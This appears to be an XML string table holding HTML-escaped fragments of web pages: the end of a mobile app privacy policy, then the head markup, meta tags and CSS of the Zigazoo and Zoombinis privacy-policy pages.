    <t xml:space="preserve">&lt;/p&gt; &lt;div&gt;&lt;p&gt;
 The app does use third party services that may collect
information used to identify you.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;
Link to privacy policy of third party service providers used
by the app
&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="https://www.google.com/policies/privacy/" target="_blank" rel="noopener noreferrer"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://firebase.google.com/policies/analytics" target="_blank" rel="noopener noreferrer"&gt;Google Analytics for Firebase&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt; &lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
</t>
  </si>
  <si>
    <t>We want to inform you that whenever you
use our Service, in a case of an error in the app
we collect data and information (through third party
products) on your phone called Log Data. This Log Data may
include information such as your device Internet Protocol
(“IP”) address, device name, operating system version, the
configuration of the app when utilizing our Service,
the time and date of your use of the Service, and other
statistics.
 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;
Cookies are files with a small amount of data that are
commonly used as anonymous unique identifiers. These are sent
to your browser from the websites that you visit and are
stored on your device's internal memory.
 &lt;/p&gt; &lt;p&gt;
</t>
  </si>
  <si>
    <t>This Service does not use these “cookies” explicitly. However,
the app may use third party code and libraries that use
“cookies” to collect information and improve their services.
 You have the option to either accept or refuse these cookies
and know when a cookie is being sent to your device.</t>
  </si>
  <si>
    <t xml:space="preserve">If you
choose to refuse our cookies, you may not be able to use some
portions of this Service.
 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
We may employ third-party companies and
individuals due to the following reasons:
&lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We want to inform users of this Service
that these third parties have access to your Personal
Information. The reason is to perform the tasks assigned to
them on our behalf. However, they are obligated not to
disclose or use the information for any other purpose.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
 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t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
 This Service may contain links to other sites. If you click on
a third-party link, you will be directed to that site.</t>
  </si>
  <si>
    <t xml:space="preserve">Note
that these external sites are not operated by us.
 Therefore, we strongly advise you to review the
Privacy Policy of these websites. We have
no control over and assume no responsibility for the content,
privacy policies, or practices of any third-party sites or
services.
</t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
These Services do not address anyone under the age of 13.
 We do not knowingly collect personally
identifiable information from children under 13. In the case
we discover that a child under 13 has provided
us with personal information, we immediately
delete this from our servers.</t>
  </si>
  <si>
    <t xml:space="preserve">If you are a parent or guardian
and you are aware that your child has provided us with
personal information, please contact us so that
we will be able to do necessary actions.
 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We may update our Privacy Policy from
time to time. Thus, you are advised to review this page
periodically for any changes. We will
notify you of any changes by posting the new Privacy Policy on
this page.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt; This policy is effective as of 2021-2-2&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
If you have any questions or suggestions about our
Privacy Policy, do not hesitate to contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9af4f5ecfbfdfbf7fff1f3fee9dafdf7fbf3f6b4f9f5f7b4"&gt;[email&amp;#160;protected]&lt;/a&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;title&gt;Privacy Policy &amp;#x2d; Zigazoo&lt;/title&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;!-- The SEO Framework by Sybre Waaijer --&gt;
&lt;meta name="robots" content="max-snippet:-1,max-image-preview:large,max-video-preview:-1" /&gt;
&lt;meta name="description" content="Effective date: April 5, 2022 At Zigazoo, we take your privacy seriously. Please read the following to learn how we treat your personal information."</t>
  </si>
  <si>
    <t>/&gt;
&lt;meta property="og:image" content="https://zigazoo.com/wp-content/uploads/2023/03/cropped-Logo_z_GA@2x.png" /&gt;
&lt;meta property="og:image:width" content="1199" /&gt;
&lt;meta property="og:image:height" content="945" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="website" /&gt;
&lt;meta property="og:title" content="Privacy Policy" /&gt;
&lt;meta property="og:description" content="Effective date: April 5, 2022 At Zigazoo, we take your privacy seriously. Please read the following to learn how we treat your personal information. By using or accessing the Services in any manner&amp;#8230;" /&gt;
&lt;meta property="og:url" content="https://zigazoo.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="Zigazoo" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:title" content="Privacy Policy" /&gt;
&lt;meta name="twitter:description" content="Effective date: April 5, 2022 At Zigazoo, we take your privacy seriously.</t>
  </si>
  <si>
    <t xml:space="preserve">Please read the following to learn how we treat your personal information. By using or accessing the Services in any manner&amp;#8230;" /&gt;
&lt;meta name="twitter:image" content="https://zigazoo.com/wp-content/uploads/2023/03/cropped-Logo_z_GA@2x.png" /&gt;
&lt;link rel="canonical" href="https://zigazoo.com/privacy-policy/" /&gt;
&lt;script type="application/ld+json"&gt;{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"https://zigazoo.com/","name":"Zigazoo: Nontoxic Social Media"}},{"@type":"ListItem","position":2,"item":{"@id":"https://zigazoo.com/privacy-policy/","name":"Privacy Policy"}}]}&lt;/script&gt;
&lt;!-- / The SEO Framework by Sybre Waaijer | 3.17ms meta | 0.42ms boot --&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link href='https://fonts.googleapis.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Zigazoo &amp;raquo; Feed" href="https://zigazoo.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Zigazoo &amp;raquo; Comments Feed" href="https://zigazoo.com/comments/feed/" /&gt;
&lt;script&gt;
</t>
  </si>
  <si>
    <t>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/zigazoo.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline !</t>
  </si>
  <si>
    <t>important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://zigazoo.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' media='all' /&gt;
&lt;link rel='stylesheet' id='safe-svg-block-frontend-css' href='https://zigazoo.com/wp-content/plugins/safe-svg//dist/safe-svg-block-frontend.css?ver=2.1.0' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://zigazoo.com/wp-includes/css/classic-themes.min.css?ver=6.2' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--contrast: var(--contrast);--wp--preset--color--contrast-2: var(--contrast-2);--wp--preset--color--contrast-3: var(--contrast-3);--wp--preset--color--base: var(--base);--wp--preset--color--base-2: var(--base-2);--wp--preset--color--base-3: var(--base-3);--wp--preset--color--accent: var(--accent);--wp--preset--color--global-color-8: var(--global-color-8);--wp--preset--color--global-color-9: var(--global-color-9);--wp--preset--color--global-color-10: var(--global-color-10);--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp:</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</si>
  <si>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rel='stylesheet' id='generate-widget-areas-css' href='https://zigazoo.com/wp-content/themes/generatepress/assets/css/components/widget-areas.min.css?ver=3.3.0' media='all' /&gt;
&lt;link rel='stylesheet' id='generate-style-css' href='https://zigazoo.com/wp-content/themes/generatepress/assets/css/main.min.css?ver=3.3.0' media='all' /&gt;
&lt;style id='generate-style-inline-css'&gt;
body{background-color:var(--contrast);color:var(--base-3);}a{color:var(--global-color-9);}a:hover, a:focus, a:active{color:var(--accent);}.grid-container{max-width:1280px;}.wp-block-group__inner-container{max-width:1280px;margin-left:auto;margin-right:auto;}.site-header .header-image{width:250px;}:root{--contrast:#211448;--contrast-2:#1d1946;--contrast-3:#b2b2be;--base:#f0f0f0;--base-2:#f7f8f9;--base-3:#ffffff;--accent:#e456a4;--global-color-8:#51c2c8;--global-color-9:#faf200;--global-color-10:#6c57a5;}:root .has-contrast-color{color:var(--contrast);}:root .has-contrast-background-color{background-color:var(--contrast);}:root .has-contrast-2-color{color:var(--contrast-2);}:root .has-contrast-2-background-color{background-color:var(--contrast-2);}:root .has-contrast-3-color{color:var(--contrast-3);}:root .has-contrast-3-background-color{background-color:var(--contrast-3);}:root .has-base-color{color:var(--base);}:root .has-base-background-color{background-color:var(--base);}:root .has-base-2-color{color:var(--base-2);}:root .has-base-2-background-color{background-color:var(--base-2);}:root .has-base-3-color{color:var(--base-3);}:root .has-base-3-background-color{background-color:var(--base-3);}:root .has-accent-color{color:var(--accent);}:root .has-accent-background-color{background-color:var(--accent);}:root .has-global-color-8-color{color:var(--global-color-8);}:root .has-global-color-8-background-color{background-color:var(--global-color-8);}:root .has-global-color-9-color{color:var(--global-color-9);}:root .has-global-color-9-background-color{background-color:var(--global-color-9);}:root .has-global-color-10-color{color:var(--global-color-10);}:root .has-global-color-10-background-color{background-color:var(--global-color-10);}body, button, input, select, textarea{font-family:Poppins, sans-serif;}.main-title{font-size:25px;}.main-navigation a, .main-navigation .menu-toggle, .main-navigation .menu-bar-items{font-weight:700;text-transform:uppercase;font-size:15px;}h1{font-weight:700;}h2{font-weight:700;font-size:32px;}h3{font-weight:700;font-size:28px;}h4{font-weight:700;font-size:22px;}h5{font-weight:500;font-size:19px;}h6{font-weight:500;font-size:17px;}.main-navigation .menu-toggle{font-size:28px;}.top-bar{background-color:#636363;color:#ffffff;}.top-bar a{color:#ffffff;}.top-bar a:hover{color:#303030;}.site-header{background-color:var(--contrast);}.main-title a,.main-title a:hover{color:#ffffff;}.site-description{color:#757575;}.mobile-menu-control-wrapper .menu-toggle,.mobile-menu-control-wrapper .menu-toggle:hover,.mobile-menu-control-wrapper .menu-toggle:focus,.has-inline-mobile-toggle #site-navigation.toggled{background-color:rgba(0, 0, 0, 0.02);}.main-navigation,.main-navigation ul ul{background-color:var(--contrast);}.main-navigation .main-nav ul li a, .main-navigation .menu-toggle, .main-navigation .menu-bar-items{color:var(--base-3);}.main-navigation .main-nav ul li:not([class*="current-menu-"]):hover &gt; a, .main-navigation .main-nav ul li:not([class*="current-menu-"]):focus &gt; a, .main-navigation .main-nav ul li.sfHover:not([class*="current-menu-"]) &gt; a, .main-navigation .menu-bar-item:hover &gt; a, .main-navigation .menu-bar-item.sfHover &gt; a{color:#51c2c8;}button.menu-toggle:hover,button.menu-toggle:focus{color:var(--base-3);}.navigation-search input[type="search"],.navigation-search input[type="search"]:active, .navigation-search input[type="search"]:focus, .main-navigation .main-nav ul li.search-item.active &gt;</t>
  </si>
  <si>
    <t>a, .main-navigation .menu-bar-items .search-item.active &gt; a{color:#51c2c8;}.main-navigation ul ul{background-color:#eaeaea;}.main-navigation .main-nav ul ul li a{color:#515151;}.main-navigation .main-nav ul ul li:not([class*="current-menu-"]):hover &gt; a,.main-navigation .main-nav ul ul li:not([class*="current-menu-"]):focus &gt; a, .main-navigation .main-nav ul ul li.sfHover:not([class*="current-menu-"]) &gt; a{color:#7a8896;background-color:#eaeaea;}.main-navigation .main-nav ul ul li[class*="current-menu-"] &gt; a{color:#7a8896;background-color:#eaeaea;}.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header, .one-container .container, .separate-containers .paging-navigation, .inside-page-header{background-color:var(--contrast);}.entry-title a{color:#222222;}.entry-title a:hover{color:#55555e;}.entry-meta{color:#595959;}h1{color:var(--base-3);}h2{color:var(--base-3);}h3{color:var(--base-3);}h4{color:var(--base-3);}h5{color:var(--base-3);}.sidebar .widget{background-color:#ffffff;}.footer-widgets{background-color:#ffffff;}.footer-widgets .widget-title{color:#000000;}.site-info{color:#ffffff;background-color:var(--contrast);}.site-info a{color:#ffffff;}.site-info a:hover{color:var(--global-color-9);}.footer-bar .widget_nav_menu .current-menu-item a{color:var(--global-color-9);}input[type="text"],input[type="email"],input[type="url"],input[type="password"],input[type="search"],input[type="tel"],input[type="number"],textarea,select{color:#666666;background-color:#fafafa;border-color:#cccccc;}input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="number"]:focus,textarea:focus,select:focus{color:#666666;background-color:#ffffff;border-color:#bfbfbf;}button,html input[type="button"],input[type="reset"],input[type="submit"],a.button,a.wp-block-button__link:not(.has-background){color:#ffffff;background-color:#55555e;}button:hover,html input[type="button"]:hover,input[type="reset"]:hover,input[type="submit"]:hover,a.button:hover,button:focus,html input[type="button"]:focus,input[type="reset"]:focus,input[type="submit"]:focus,a.button:focus,a.wp-block-button__link:not(.has-background):active,a.wp-block-button__link:not(.has-background):focus,a.wp-block-button__link:not(.has-background):hover{color:#ffffff;background-color:#3f4047;}a.generate-back-to-top{background-color:#343434;color:#ffffff;}a.generate-back-to-top:hover,a.generate-back-to-top:focus{background-color:#3d3d3d;color:#ffffff;}:root{--gp-search-modal-bg-color:var(--base-3);--gp-search-modal-text-color:var(--contrast);--gp-search-modal-overlay-bg-color:rgba(0,0,0,0.2);}@media (max-width: 950px){.main-navigation .menu-bar-item:hover &gt; a, .main-navigation .menu-bar-item.sfHover &gt; a{background:none;color:var(--base-3);}}.nav-below-header .main-navigation .inside-navigation.grid-container, .nav-above-header .main-navigation .inside-navigation.grid-container{padding:0px 20px 0px 20px;}.site-main .wp-block-group__inner-container{padding:40px;}.separate-containers .paging-navigation{padding-top:20px;padding-bottom:20px;}.entry-content .alignwide, body:not(.no-sidebar) .entry-content .alignfull{margin-left:-40px;width:calc(100% + 80px);max-width:calc(100% + 80px);}.rtl .menu-item-has-children .dropdown-menu-toggle{padding-left:20px;}.rtl .main-navigation .main-nav ul li.menu-item-has-children &gt; a{padding-right:20px;}@media (max-width:768px){.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header, .separate-containers .paging-navigation, .one-container .site-content, .inside-page-header{padding:30px;}.site-main .wp-block-group__inner-container{padding:30px;}.inside-top-bar{padding-right:30px;padding-left:30px;}.inside-header{padding-right:30px;padding-left:30px;}.widget-area .widget{padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px;}.footer-widgets-container{padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px;}.inside-site-info{padding-right:30px;padding-left:30px;}.entry-content .alignwide, body:not(.no-sidebar) .entry-content .alignfull{margin-left:-30px;width:calc(100%</t>
  </si>
  <si>
    <t>+ 60px);max-width:calc(100% + 60px);}.one-container .site-main .paging-navigation{margin-bottom:20px;}}/* End cached CSS */.is-right-sidebar{width:30%;}.is-left-sidebar{width:30%;}.site-content .content-area{width:100%;}@media (max-width: 950px){.main-navigation .menu-toggle,.sidebar-nav-mobile:not(#sticky-placeholder){display:block;}.main-navigation ul,.gen-sidebar-nav,.main-navigation:not(.slideout-navigation):not(.toggled) .main-nav &gt; ul,.has-inline-mobile-toggle #site-navigation .inside-navigation &gt; *:not(.navigation-search):not(.main-nav){display:none;}.nav-align-right .inside-navigation,.nav-align-center .inside-navigation{justify-content:space-between;}.has-inline-mobile-toggle .mobile-menu-control-wrapper{display:flex;flex-wrap:wrap;}.has-inline-mobile-toggle .inside-header{flex-direction:row;text-align:left;flex-wrap:wrap;}.has-inline-mobile-toggle .header-widget,.has-inline-mobile-toggle #site-navigation{flex-basis:100%;}.nav-float-left .has-inline-mobile-toggle #site-navigation{order:10;}}
.dynamic-author-image-rounded{border-radius:100%;}.dynamic-featured-image, .dynamic-author-image{vertical-align:middle;}.one-container.blog .dynamic-content-template:not(:last-child), .one-container.archive .dynamic-content-template:not(:last-child){padding-bottom:0px;}.dynamic-entry-excerpt &gt; p:last-child{margin-bottom:0px;}
.main-navigation .main-nav ul li a,.menu-toggle,.main-navigation .menu-bar-item &gt; a{transition: line-height 300ms ease}.main-navigation.toggled .main-nav &gt; ul{background-color: var(--contrast)}.sticky-enabled .gen-sidebar-nav.is_stuck .main-navigation {margin-bottom: 0px;}.sticky-enabled .gen-sidebar-nav.is_stuck {z-index: 500;}.sticky-enabled .main-navigation.is_stuck {box-shadow: 0</t>
  </si>
  <si>
    <t>2px 2px -2px rgba(0, 0, 0, .2);}.navigation-stick:not(.gen-sidebar-nav) {left: 0;right: 0;width: 100% ! important;}.both-sticky-menu .main-navigation:not(#mobile-header).toggled .main-nav &gt; ul,.mobile-sticky-menu .main-navigation:not(#mobile-header).toggled .main-nav &gt;</t>
  </si>
  <si>
    <t>ul,.mobile-header-sticky #mobile-header.toggled .main-nav &gt; ul {position: absolute;left: 0;right: 0;z-index: 999;}@media (max-width: 950px){#sticky-placeholder{height:0;overflow:hidden;}.has-inline-mobile-toggle #site-navigation.toggled{margin-top:0;}.has-inline-mobile-menu #site-navigation.toggled .main-nav &gt; ul{top:1.5em;}}.nav-float-right .navigation-stick {width: 100% ! important;left: 0;}.nav-float-right .navigation-stick .navigation-branding {margin-right: auto;}.main-navigation.has-sticky-branding:not(.grid-container) .inside-navigation:not(.grid-container) .navigation-branding{margin-left: 10px;}.main-navigation.navigation-stick.has-sticky-branding .inside-navigation.grid-container{padding-left:40px;padding-right:40px;}@media (max-width:768px){.main-navigation.navigation-stick.has-sticky-branding .inside-navigation.grid-container{padding-left:0;padding-right:0;}}
&lt;/style&gt;
&lt;link rel='stylesheet' id='generate-google-fonts-css' href='https://fonts.googleapis.com/ css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;#038;display=auto&amp;#038;ver=3.3.0' media='all' /&gt;
&lt;style id='generateblocks-inline-css'&gt;
.gb-container .wp-block-image img{vertical-align:middle;}.gb-container .gb-shape{position:absolute;overflow:hidden;pointer-events:none;line-height:0;}.gb-container .gb-shape svg{fill:currentColor;}.gb-container-d80fe418{display:flex;flex-wrap:nowrap;}.gb-button{text-decoration:none;}.gb-icon svg{height:1em;width:1em;fill:currentColor;}a.gb-button-8bc09c3d{display:inline-flex;align-items:center;justify-content:center;background-color:#e456a4;color:#ffffff;text-transform:initial;text-align:center;padding:8px 24px;border-radius:64px;margin-right:20px;margin-left:20px;border-color:#ffffff;}a.gb-button-8bc09c3d:hover, a.gb-button-8bc09c3d:active, a.gb-button-8bc09c3d:focus{background-color:#ffffff;color:#e456a4;border-color:#ffffff;}a.gb-button-8bc09c3d .gb-icon{font-size:1em;line-height:0;padding-right:0.5em;}a.gb-button-74bb0f42{display:inline-flex;align-items:center;justify-content:center;background-color:#e456a4;color:#ffffff;text-transform:initial;text-align:</t>
  </si>
  <si>
    <t>center;padding:8px 24px;border-radius:64px;border-color:#ffffff;}a.gb-button-74bb0f42:hover, a.gb-button-74bb0f42:active, a.gb-button-74bb0f42:focus{background-color:#ffffff;color:#e456a4;border-color:#ffffff;}a.gb-button-74bb0f42 .gb-icon{font-size:1em;line-height:0;padding-right:0.5em;}
&lt;/style&gt;
&lt;style id='kadence-blocks-global-variables-inline-css'&gt;
:root {--global-kb-font-size-sm:clamp(0.8rem, 0.73rem + 0.217vw, 0.9rem);--global-kb-font-size-md:clamp(1.1rem, 0.995rem + 0.326vw, 1.25rem);--global-kb-font-size-lg:clamp(1.75rem, 1.576rem + 0.543vw, 2rem);--global-kb-font-size-xl:clamp(2.25rem, 1.728rem + 1.63vw, 3rem);--global-kb-font-size-xxl:clamp(2.5rem, 1.456rem + 3.26vw, 4rem);--global-kb-font-size-xxxl:clamp(2.75rem, 0.489rem + 7.065vw, 6rem);}
&lt;/style&gt;
&lt;link rel='stylesheet' id='generate-offside-css' href='https://zigazoo.com/wp-content/plugins/gp-premium/menu-plus/functions/css/offside.min.css?ver=2.3.0' media='all' /&gt;
&lt;style id='generate-offside-inline-css'&gt;
:root{--gp-slideout-width:265px;}.slideout-navigation.main-navigation{background-color:var(--accent);}.slideout-navigation.main-navigation .main-nav ul li:not([class*="current-menu-"]):hover &gt; a, .slideout-navigation.main-navigation .main-nav ul li:not([class*="current-menu-"]):focus &gt; a, .slideout-navigation.main-navigation .main-nav ul li.sfHover:not([class*="current-menu-"]) &gt; a{color:var(--global-color-9);}.slideout-navigation.main-navigation .main-nav ul li[class*="current-menu-"] &gt; a{color:var(--global-color-9);}.slideout-navigation, .slideout-navigation a{color:var(--base-3);}.slideout-navigation button.slideout-exit{color:var(--base-3);padding-left:20px;padding-right:20px;}.slide-opened nav.toggled .menu-toggle:before{display:none;}@media (max-width: 950px){.menu-bar-item.slideout-toggle{display:none;}}
.slideout-navigation.main-navigation .main-nav ul li a{font-weight:700;text-transform:uppercase;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='generate-navigation-branding-css' href='https://zigazoo.com/wp-content/plugins/gp-premium/menu-plus/functions/css/navigation-branding-flex.min.css?ver=2.3.0' media='all' /&gt;
&lt;style id='generate-navigation-branding-inline-css'&gt;
.main-navigation.has-branding .inside-navigation.grid-container, .main-navigation.has-branding.grid-container .inside-navigation:not(.grid-container){padding:0px 40px 0px 40px;}.main-navigation.has-branding:not(.grid-container) .inside-navigation:not(.grid-container) .navigation-branding{margin-left:10px;}.main-navigation .sticky-navigation-logo, .main-navigation.navigation-stick .site-logo:not(.mobile-header-logo){display:none;}.main-navigation.navigation-stick .sticky-navigation-logo{display:block;}.navigation-branding img, .site-logo.mobile-header-logo img{height:60px;width:auto;}.navigation-branding .main-title{line-height:60px;}@media (max-width: 950px){.main-navigation.has-branding.nav-align-center .menu-bar-items, .main-navigation.has-sticky-branding.navigation-stick.nav-align-center .menu-bar-items{margin-left:auto;}.navigation-branding{margin-right:auto;margin-left:10px;}.navigation-branding .main-title, .mobile-header-navigation .site-logo{margin-left:10px;}.main-navigation.has-branding .inside-navigation.grid-container{padding:0px;}}
&lt;/style&gt;
&lt;script src='https://zigazoo.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://zigazoo.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://zigazoo.com/wp-json/wp/v2/pages/422" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://zigazoo.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://zigazoo.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://zigazoo.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzigazoo.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://zigazoo.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzigazoo.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style&gt;.recentcomments a{display:inline !important;padding:0 ! important;margin:0 !</t>
  </si>
  <si>
    <t>important;}&lt;/style&gt;&lt;link rel="icon" href="https://zigazoo.com/wp-content/uploads/2023/03/cropped-favicon-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://zigazoo.com/wp-content/uploads/2023/03/cropped-favicon-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://zigazoo.com/wp-content/upload</t>
  </si>
  <si>
    <t>&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;title&gt;Privacy Policy | Zoombinis&lt;/title&gt;
&lt;link rel="shortcut icon" href="https://www.terc.edu/zoombinis/wp-content/uploads/sites/16/2020/12/favicon_900.jpg" type="image/x-icon" /&gt;
&lt;link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.10/css/all.css" integrity="sha384-+d0P83n9kaQMCwj8F4RJB66tzIwOKmrdb46+porD/OvrJ+37WqIM7UoBtwHO6Nlg" crossorigin="anonymous"&gt;
 &lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"&gt;
 &lt;link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" /&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Montserrat:300,400,500,600,700&amp;display=swap" rel="stylesheet"&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=IBM+Plex+Serif:200,300,400,400i,500,600&amp;display=swap" rel="stylesheet"&gt;
&lt;link rel="stylesheet" href="https://use.typekit.net/ijk6fhx.css"&gt;
 &lt;link type="text/css" rel="stylesheet" media="all" href="https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme/style.css" /&gt;
&lt;link href="https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme/css/animate.css" rel="stylesheet" media="all"&gt;
&lt;link href="https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme/css/shortcodes.css" rel="stylesheet" media="all"&gt;
&lt;link href="https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme/css/move_1_columns_6.css" rel="stylesheet" media="all"&gt;
 &lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//platform-api.sharethis.com' /&gt;
&lt;link rel='dns-prefetch' href='//www.terc.edu' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.terc.edu\/zoombinis\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*!</t>
  </si>
  <si>
    <t>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 important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.terc.edu/zoombinis/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.terc.edu/zoombinis/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css'&gt;
